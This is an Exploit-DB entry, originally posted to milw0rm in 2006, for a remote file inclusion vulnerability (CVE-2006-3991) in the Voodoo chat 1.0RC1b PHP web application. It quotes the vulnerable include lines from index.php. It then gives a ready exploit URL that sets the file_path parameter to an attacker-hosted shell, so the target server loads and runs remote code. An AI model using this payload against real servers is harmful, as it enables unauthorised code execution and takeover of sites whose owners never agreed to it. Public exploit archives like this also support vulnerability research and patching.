Voodoo chat 1.0RC1b - 'file_path' Remote File Inclusion
Author: SHiKaA
type: webapps
platform: php
port:
date_added: 2006-07-31
date_updated: 2016-08-31
verified: 1
codes: OSVDB-30197;CVE-2006-3991
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comvoc-1.0RC1b.tar.gz
#=================================================================
#Voodoo chat 1.0RC1b <= (file_path) Remote File Inclusion Exploit
#================================================================
# |
#Critical Level : Dangerous |
# |
#Venedor site : http://vochat.com/ |
# |
#Version : 1.0 |
# |
#=================================================================
#Bug in : index.php
#
#Vlu Code :
#--------------------------------
#//here it can fails, i don't care. will be used default system language
#
# else include_once($file_path."languages/".$language.".php");
#
# include($file_path."designes/".$design."/index.php");
#?>
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?file_path=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================
# milw0rm.com [2006-08-01]